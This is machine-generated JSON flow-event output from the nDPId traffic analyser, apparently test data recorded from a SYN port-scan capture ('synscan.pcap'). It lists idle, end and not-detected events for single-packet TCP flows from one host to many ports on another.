-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275058031,"flow_last_seen":1278275058093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275058031,"flow_last_seen":1278275058093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
